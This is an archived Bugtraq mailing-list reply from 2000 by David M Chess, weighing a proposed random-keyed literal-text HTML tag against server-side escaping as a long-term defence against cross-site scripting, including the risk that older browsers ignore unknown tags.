Bugtraq mailing list archives

Re: Cross site scripting: a long term fix


From: David M Chess/Watson/IBM <chess () US IBM COM>
Date: Tue, 10 Oct 2000 13:38:53 -0400

Cooper wrote:

What's the difference between:

$RANDOM=gen_random();
echo "<TEXT key=$RANDOM>$DB_TEXT_FIELD</TEXT key=$RANDOM>";

and

$HTML_OUT=text2html($DB_TEXT_FIELD);
echo "<P>$HTML_OUT<P>"

Well, one difference that springs to mind is that the <TEXT> approach
relies only on the client knowing how not to interpret a bunch of data,
whereas the text2html approach relies on the client and the text2html()
function having the same idea of what's interpretable and what isn't.  So
if (for instance) the client interprets some complex multi-byte sequence as
a Unicode less-than, but the text2html() function doesn't, an attacker may
be able to get markup to the client, past text2html(), by using that
sequence.  We've certainly seen multiple instances of this kind of
"disagreeing interpreters" problem in the past!  A whitelist-based
text2html (that escaped every character not in a recognized list of OK
characters) might work better, but again you have to make sure to get the
whitelist right to avoid both insecurity and ugliness.

Also note that your solution if implemented today will make your
forum only accessible to those lucky few that are willing to update
their browser so they can browse sites that use that tag. The rest
will not see the posted comments.

Actually the rest *will* see the posted comments, and their browsers will
happily interpret any HTML contained therein.  When browsers see tags they
don't recognize, they simply ignore the tags and treat the enclosed text as
ordinary (marked up) stuff.  Try putting <bleen> and </bleen> around some
text in an HTML file you control, and note that the text does not
disappear.  So the "legacy browsers" problem is actually even worse than
you suggest; people with older browsers will be vulnerable, not merely left
out of the conversation.

The "how do you end the literal block?" question seems kinda thorny.  A
fence-string could be made to work, but only if page designers can remember
to use a "generate a string that isn't contained in the given string"
function to choose the fence, rather than just hardcoding it or using a
guessable random source.  And such a function might have its own subtle
Unicode-like problems (when are two strings the same?).  A character count
might be plausible, although since no other feature of HTML includes such a
beast it'd probably be hard to get such a thing adopted in practice.  And I
can imagine some (possibly exploitable) trouble making it work, involving
(once again!) things like how to count the characters in a Unicode string,
and how many characters there are in a newline.

This is probably worth talking a bit more about, though!  Off the top of my
head, I like Tollef Fog Heen's suggestion of a "go fetch this URI and
render it here as uninterpreted text" tag.  Sort of an IFRAME that's been
turned to the Good Side of the Force.    *8)     It avoids the "legacy
clients are left vulnerable" problem also.

DC


Current thread: